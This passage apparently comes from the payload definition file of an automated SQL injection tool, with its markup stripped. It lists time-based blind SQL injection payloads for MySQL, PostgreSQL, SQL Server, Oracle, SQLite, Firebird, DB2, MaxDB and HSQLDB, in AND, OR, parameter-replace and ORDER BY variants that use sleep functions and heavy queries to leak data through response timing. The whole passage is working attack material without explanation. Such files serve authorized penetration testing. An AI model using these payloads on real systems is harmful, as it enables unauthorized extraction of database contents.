- AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- SAP MaxDB AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
- --
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- IBM DB2 AND time-based blind (heavy query)
- 5
- 3
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
- IBM DB2 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
- --
-
-
-
-
-
- IBM DB2
-
-
-
-
- HSQLDB >= 1.7.2 AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 AND time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- HSQLDB > 2.0 AND time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- AND '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
-
-
-
- MySQL > 5.0.11 OR time-based blind (SELECT)
- 5
- 1
- 3
- 1,2,3
- 2
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 OR time-based blind (SELECT - comment)
- 5
- 4
- 3
- 1,2,3
- 2
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 OR time-based blind
- 5
- 2
- 3
- 1,2,3
- 2
- OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
-
- OR [RANDNUM]=SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL < 5.0.12 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3
- 2
- OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
-
- OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 OR time-based blind
- 5
- 3
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase OR time-based blind (heavy query)
- 5
- 3
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle OR time-based blind
- 5
- 3
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
-
-
-
-
-
- Oracle
-
-
-
-
- SQLite > 2.0 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1
- 2
- OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
-
- OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird OR time-based blind (heavy query)
- 5
- 5
- 3
- 1
- 2
- OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB OR time-based blind (heavy query - comment)
- 5
- 4
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- IBM DB2 OR time-based blind (heavy query)
- 5
- 4
- 3
- 1,2,3
- 2
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
- HSQLDB >= 1.7.2 OR time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB >= 1.7.2 OR time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 OR time-based blind (heavy query)
- 5
- 4
- 2
- 1,2,3
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
- HSQLDB > 2.0 OR time-based blind (heavy query - comment)
- 5
- 5
- 2
- 1,2,3
- 1
- OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END
-
- OR '[RANDSTR]'=REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)
- --
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
-
-
-
- MySQL >= 5.1 time-based blind - PROCEDURE ANALYSE (EXTRACTVALUE)
- 5
- 3
- 1
- 1,2,3,4,5
- 1
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])))),1)
-
- PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\',(BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))))),1)
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
-
-
- MySQL > 5.0.11 time-based blind - Parameter replace (SELECT)
- 5
- 4
- 1
- 1,2,3
- 3
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL > 5.0.11 time-based blind - Parameter replace (SELECT - comment)
- 5
- 5
- 1
- 1,2,3
- 3
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
-
- (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
- #
-
-
-
-
-
- MySQL
- > 5.0.11
-
-
-
-
- MySQL >= 5.0 time-based blind - Parameter replace
- 5
- 3
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
-
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL < 5.0 time-based blind - Parameter replace (heavy queries)
- 5
- 4
- 2
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL time-based blind - Parameter replace (bool*int)
- 5
- 4
- 1
- 1,2,3
- 3
- ([INFERENCE])*SLEEP([SLEEPTIME])
-
- ([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL time-based blind - Parameter replace (MAKE_SET)
- 5
- 5
- 1
- 1,2,3
- 3
- MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))
-
- MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- MySQL time-based blind - Parameter replace (ELT)
- 5
- 5
- 1
- 1,2,3
- 3
- ELT([INFERENCE],SLEEP([SLEEPTIME]))
-
- ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 time-based blind - Parameter replace
- 5
- 3
- 1
- 1,2,3
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
-
- (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3
- 3
- (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
-
- (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - Parameter replace
- 5
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - Parameter replace (heavy queries)
- 5
- 4
- 2
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
-
- Oracle time-based blind - Parameter replace (DBMS_LOCK.SLEEP)
- 5
- 3
- 0
- 1,3
- 3
- BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
-
- BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - Parameter replace (DBMS_PIPE.RECEIVE_MESSAGE)
- 5
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - Parameter replace (heavy queries)
- 5
- 4
- 2
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- SQLite > 2.0 time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))
-
- (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))))
-
-
-
-
-
- SQLite
- > 2.0
-
-
-
-
- Firebird time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3
- 3
- IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])
-
- (SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)
-
-
-
-
-
- Firebird
- >= 2.0
-
-
-
-
- SAP MaxDB time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,3
- 3
- (SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)
-
- (SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)
-
-
-
-
-
- SAP MaxDB
-
-
-
-
- IBM DB2 time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3
- 3
- (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))
-
- (SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)
-
-
-
-
-
- IBM DB2
-
-
-
-
-
- HSQLDB >= 1.7.2 time-based blind - Parameter replace (heavy query)
- 5
- 4
- 2
- 1,2,3
- 1
- (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 time-based blind - Parameter replace (heavy query)
- 5
- 5
- 2
- 1,2,3
- 1
- (SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))
-
-
-
-
-
- HSQLDB
- > 2.0
-
-
-
-
-
-
-
- MySQL >= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
-
-
-
- MySQL
- >= 5.0.11
-
-
-
-
- MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
-
-
-
- MySQL
-
-
-
-
- PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))
-
-
-
-
-
- PostgreSQL
- > 8.1
-
-
-
-
- PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))
-
-
-
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
-
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_LOCK.SLEEP)
- 5
- 3
- 0
- 2,3
- 1
- ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
-
- ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)
- 5
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
-
-
-
- Oracle
-
-
-
-
- HSQLDB >= 1.7.2 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
- 5
- 4
- 2
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)
- --
-
-
-
-
-
- HSQLDB
- >= 1.7.2
-
-
-
-
- HSQLDB > 2.0 time-based blind - GROUP BY and ORDER BY clauses (heavy query)
- 5
- 4
- 2
- 2,3
- 1
